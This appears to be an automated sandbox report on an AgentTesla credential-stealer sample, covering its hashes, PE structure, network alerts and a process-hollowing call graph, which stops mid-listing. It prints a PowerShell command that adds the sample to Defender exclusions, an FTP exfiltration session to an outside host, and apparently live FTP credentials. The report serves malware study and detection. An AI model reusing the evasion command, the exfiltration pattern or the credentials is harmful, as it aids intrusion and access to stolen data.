                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cp5e2h31.qhs.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hib0shyb.1ad.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyod5z2l.jkj.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.526024456744009
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:hesaphareket.exe
                                                  File size:979'456 bytes
                                                  MD5:f698edb1fcf31bb642bc2e18b3f05813
                                                  SHA1:b73dbfbedbe4bc7fad70def31c2bf94ec18ff992
                                                  SHA256:5618efb4038198984ccca27de0dd5850a697038d9f0c2a9ad26b17bb26cc0f7b
                                                  SHA512:1c5dac5b9ece2316e08ca770f918298be6da37ee2f44b076ae50c3f694b659fde9384077c0f39d598074936db93c068a9a3b66600e83acbaa4a8c8b6befaf30c
                                                  SSDEEP:24576:U5Orr6zCDzxWGXyFML1yUWf5ObxB7hPAycTy8s:AzC5WGXmMByUWf5q1Ayc
                                                  TLSH:0425AF20B7F8DE67E27AA0F3DB84421197B6D545767FE3AA0CC564CE26C27211383927
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.>g..............0......(........... ........@.. .......................`............@................................

                                                  File Icon

                                                  Icon Hash:130b253d1931012d

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4ee68e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x673EA430 [Thu Nov 21 03:08:32 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xee63c0x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x2588.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xec6940xec80098c245d3d52a549ffa0331c0323970e0False0.7366037509910148data7.528109321327333IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xf00000x25880x2600a012ba9422712b865f10d31fd7c6d07bFalse0.8751027960526315data7.576677953691508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xf40000xc0x20073ac84c571b6d713397d5c7cbdd7ecf6False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xf01000x2016PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9504504504504504
                                                  RT_GROUP_ICON0xf21280x14data1.05
                                                  RT_VERSION0xf214c0x23cdata0.46678321678321677
                                                  RT_MANIFEST0xf23980x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-11-24T08:22:44.191583+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.1149712104.247.165.9921TCP
                                                  2024-11-24T08:22:45.338474+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1149724104.247.165.9957378TCP
                                                  2024-11-24T08:22:45.459003+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1149724104.247.165.9957378TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 24, 2024 08:22:39.977790117 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:40.097394943 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:40.097515106 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:41.348992109 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:41.349318027 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:41.468837976 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:41.822871923 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:41.823096037 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:41.942532063 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:42.306622028 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:42.307049990 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:42.427345037 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:42.747381926 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:42.747612000 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:42.867136955 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:43.186978102 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:43.187452078 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:43.306967020 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:43.627151012 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:43.627379894 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:43.747423887 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:44.069817066 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:44.070785046 CET4972457378192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:44.122653961 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:44.190423965 CET5737849724104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:44.190902948 CET4972457378192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:44.191582918 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:44.311094999 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:45.337331057 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:45.338474035 CET4972457378192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:45.338548899 CET4972457378192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:45.388262987 CET4971221192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:45.458626986 CET5737849724104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:45.458951950 CET5737849724104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:45.459002972 CET4972457378192.168.2.11104.247.165.99
                                                  Nov 24, 2024 08:22:45.779582024 CET2149712104.247.165.99192.168.2.11
                                                  Nov 24, 2024 08:22:45.825776100 CET4971221192.168.2.11104.247.165.99

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 24, 2024 08:22:39.209144115 CET5329053192.168.2.111.1.1.1
                                                  Nov 24, 2024 08:22:39.966885090 CET53532901.1.1.1192.168.2.11

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 24, 2024 08:22:39.209144115 CET192.168.2.111.1.1.10x3bdaStandard query (0)ftp.normagroup.com.trA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 24, 2024 08:22:39.966885090 CET1.1.1.1192.168.2.110x3bdaNo error (0)ftp.normagroup.com.tr104.247.165.99A (IP address)IN (0x0001)false

                                                  FTP Packets

                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Nov 24, 2024 08:22:41.348992109 CET2149712104.247.165.99192.168.2.11220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 10:22. Server port: 21.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 10:22. Server port: 21.220-This is a private system - No anonymous login
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 10:22. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 10:22. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                  Nov 24, 2024 08:22:41.349318027 CET4971221192.168.2.11104.247.165.99USER admins@normagroup.com.tr
                                                  Nov 24, 2024 08:22:41.822871923 CET2149712104.247.165.99192.168.2.11331 User admins@normagroup.com.tr OK. Password required
                                                  Nov 24, 2024 08:22:41.823096037 CET4971221192.168.2.11104.247.165.99PASS ab+LNvim5PAo
                                                  Nov 24, 2024 08:22:42.306622028 CET2149712104.247.165.99192.168.2.11230 OK. Current restricted directory is /
                                                  Nov 24, 2024 08:22:42.747381926 CET2149712104.247.165.99192.168.2.11504 Unknown command
                                                  Nov 24, 2024 08:22:42.747612000 CET4971221192.168.2.11104.247.165.99PWD
                                                  Nov 24, 2024 08:22:43.186978102 CET2149712104.247.165.99192.168.2.11257 "/" is your current location
                                                  Nov 24, 2024 08:22:43.187452078 CET4971221192.168.2.11104.247.165.99TYPE I
                                                  Nov 24, 2024 08:22:43.627151012 CET2149712104.247.165.99192.168.2.11200 TYPE is now 8-bit binary
                                                  Nov 24, 2024 08:22:43.627379894 CET4971221192.168.2.11104.247.165.99PASV
                                                  Nov 24, 2024 08:22:44.069817066 CET2149712104.247.165.99192.168.2.11227 Entering Passive Mode (104,247,165,99,224,34)
                                                  Nov 24, 2024 08:22:44.191582918 CET4971221192.168.2.11104.247.165.99STOR PW_user-405464_2024_11_24_02_22_38.html
                                                  Nov 24, 2024 08:22:45.337331057 CET2149712104.247.165.99192.168.2.11150 Accepted data connection
                                                  Nov 24, 2024 08:22:45.779582024 CET2149712104.247.165.99192.168.2.11226-File successfully transferred
                                                  226-File successfully transferred226 0.442 seconds (measured here), 0.70 Kbytes per second

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:02:22:34
                                                  Start date:24/11/2024
                                                  Path:C:\Users\user\Desktop\hesaphareket.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\hesaphareket.exe"
                                                  Imagebase:0x210000
                                                  File size:979'456 bytes
                                                  MD5 hash:F698EDB1FCF31BB642BC2E18B3F05813
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:02:22:35
                                                  Start date:24/11/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"
                                                  Imagebase:0x290000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:02:22:35
                                                  Start date:24/11/2024
                                                  Path:C:\Users\user\Desktop\hesaphareket.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\hesaphareket.exe"
                                                  Imagebase:0x3e0000
                                                  File size:979'456 bytes
                                                  MD5 hash:F698EDB1FCF31BB642BC2E18B3F05813
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:02:22:35
                                                  Start date:24/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff68cce0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:02:22:35
                                                  Start date:24/11/2024
                                                  Path:C:\Users\user\Desktop\hesaphareket.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\hesaphareket.exe"
                                                  Imagebase:0x7ff68cce0000
                                                  File size:979'456 bytes
                                                  MD5 hash:F698EDB1FCF31BB642BC2E18B3F05813
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:02:22:36
                                                  Start date:24/11/2024
                                                  Path:C:\Users\user\Desktop\hesaphareket.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\hesaphareket.exe"
                                                  Imagebase:0x910000
                                                  File size:979'456 bytes
                                                  MD5 hash:F698EDB1FCF31BB642BC2E18B3F05813
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:8
                                                  Start time:02:22:38
                                                  Start date:24/11/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff6220e0000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:10.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:7.5%
                                                    Total number of Nodes:173
                                                    Total number of Limit Nodes:10
                                                    execution_graph 23147 b5d5f0 DuplicateHandle 23148 b5d686 23147->23148 23149 b5ac10 23153 b5ad08 23149->23153 23158 b5acf9 23149->23158 23150 b5ac1f 23154 b5ad3c 23153->23154 23155 b5ad19 23153->23155 23154->23150 23155->23154 23156 b5af40 GetModuleHandleW 23155->23156 23157 b5af6d 23156->23157 23157->23150 23159 b5ad3c 23158->23159 23160 b5ad19 23158->23160 23159->23150 23160->23159 23161 b5af40 GetModuleHandleW 23160->23161 23162 b5af6d 23161->23162 23162->23150 23339 b5cfa0 23340 b5cfe6 GetCurrentProcess 23339->23340 23342 b5d038 GetCurrentThread 23340->23342 23345 b5d031 23340->23345 23343 b5d075 GetCurrentProcess 23342->23343 23344 b5d06e 23342->23344 23346 b5d0ab 23343->23346 23344->23343 23345->23342 23347 b5d0d3 GetCurrentThreadId 23346->23347 23348 b5d104 23347->23348 23163 6d58353 23165 6d5811a 23163->23165 23164 6d582c6 23165->23164 23168 6d59088 23165->23168 23174 6d59078 23165->23174 23169 6d590a2 23168->23169 23180 6d59428 23169->23180 23196 6d593e8 23169->23196 23211 6d593f8 23169->23211 23170 6d590c6 23170->23164 23175 6d590a2 23174->23175 23177 6d59428 12 API calls 23175->23177 23178 6d593f8 12 API calls 23175->23178 23179 6d593e8 12 API calls 23175->23179 23176 6d590c6 23176->23164 23177->23176 23178->23176 23179->23176 23181 6d59432 23180->23181 23182 6d59409 23180->23182 23190 6d5941f 23182->23190 23226 6d59e97 23182->23226 23230 6d59b34 23182->23230 23235 6d59788 23182->23235 23241 6d59a49 23182->23241 23246 6d596a9 23182->23246 23250 6d59e2f 23182->23250 23255 6d59d82 23182->23255 23259 6d59739 23182->23259 23264 6d5981f 23182->23264 23268 6d59612 23182->23268 23272 6d59533 23182->23272 23277 6d59513 23182->23277 23190->23170 23197 6d593f8 23196->23197 23198 6d59b34 2 API calls 23197->23198 23199 6d59e97 2 API calls 23197->23199 23200 6d59513 2 API calls 23197->23200 23201 6d59533 2 API calls 23197->23201 23202 6d59612 2 API calls 23197->23202 23203 6d5981f 2 API calls 23197->23203 23204 6d59739 2 API calls 23197->23204 23205 6d5941f 23197->23205 23206 6d59d82 2 API calls 23197->23206 23207 6d59e2f 2 API calls 23197->23207 23208 6d596a9 2 API calls 23197->23208 23209 6d59a49 2 API calls 23197->23209 23210 6d59788 2 API calls 23197->23210 23198->23205 23199->23205 23200->23205 23201->23205 23202->23205 23203->23205 23204->23205 23205->23170 23206->23205 23207->23205 23208->23205 23209->23205 23210->23205 23212 6d5940d 23211->23212 23213 6d59b34 2 API calls 23212->23213 23214 6d59e97 2 API calls 23212->23214 23215 6d59513 2 API calls 23212->23215 23216 6d59533 2 API calls 23212->23216 23217 6d59612 2 API calls 23212->23217 23218 6d5981f 2 API calls 23212->23218 23219 6d59739 2 API calls 23212->23219 23220 6d5941f 23212->23220 23221 6d59d82 2 API calls 23212->23221 23222 6d59e2f 2 API calls 23212->23222 23223 6d596a9 2 API calls 23212->23223 23224 6d59a49 2 API calls 23212->23224 23225 6d59788 2 API calls 23212->23225 23213->23220 23214->23220 23215->23220 23216->23220 23217->23220 23218->23220 23219->23220 23220->23170 23221->23220 23222->23220 23223->23220 23224->23220 23225->23220 23282 6d57602 23226->23282 23286 6d57608 23226->23286 23227 6d59ec8 23231 6d59686 23230->23231 23231->23230 23232 6d59987 23231->23232 23290 6d57b30 23231->23290 23294 6d57b28 23231->23294 23236 6d59750 23235->23236 23237 6d59cde 23236->23237 23298 6d573c0 23236->23298 23302 6d573ba 23236->23302 23237->23190 23238 6d59768 23238->23190 23242 6d59817 23241->23242 23242->23241 23243 6d59f37 23242->23243 23306 6d57470 23242->23306 23310 6d5746a 23242->23310 23243->23190 23247 6d59bb6 23246->23247 23248 6d57602 WriteProcessMemory 23247->23248 23249 6d57608 WriteProcessMemory 23247->23249 23248->23247 23249->23247 23251 6d59f8b 23250->23251 23314 6d57542 23251->23314 23318 6d57548 23251->23318 23252 6d59fac 23257 6d57602 WriteProcessMemory 23255->23257 23258 6d57608 WriteProcessMemory 23255->23258 23256 6d5966e 23257->23256 23258->23256 23260 6d5973f 23259->23260 23262 6d573c0 ResumeThread 23260->23262 23263 6d573ba ResumeThread 23260->23263 23261 6d59768 23261->23190 23262->23261 23263->23261 23266 6d57470 Wow64SetThreadContext 23264->23266 23267 6d5746a Wow64SetThreadContext 23264->23267 23265 6d5983c 23265->23190 23266->23265 23267->23265 23322 6d57cbc 23268->23322 23326 6d57cc8 23268->23326 23273 6d5951f 23272->23273 23274 6d5964c 23273->23274 23275 6d57cbc CreateProcessA 23273->23275 23276 6d57cc8 CreateProcessA 23273->23276 23275->23274 23276->23274 23278 6d5951f 23277->23278 23279 6d5964c 23278->23279 23280 6d57cbc CreateProcessA 23278->23280 23281 6d57cc8 CreateProcessA 23278->23281 23280->23279 23281->23279 23283 6d57608 WriteProcessMemory 23282->23283 23285 6d576a7 23283->23285 23285->23227 23287 6d57650 WriteProcessMemory 23286->23287 23289 6d576a7 23287->23289 23289->23227 23291 6d57b7b ReadProcessMemory 23290->23291 23293 6d57bbf 23291->23293 23293->23231 23295 6d57b30 ReadProcessMemory 23294->23295 23297 6d57bbf 23295->23297 23297->23231 23299 6d57400 ResumeThread 23298->23299 23301 6d57431 23299->23301 23301->23238 23303 6d573c0 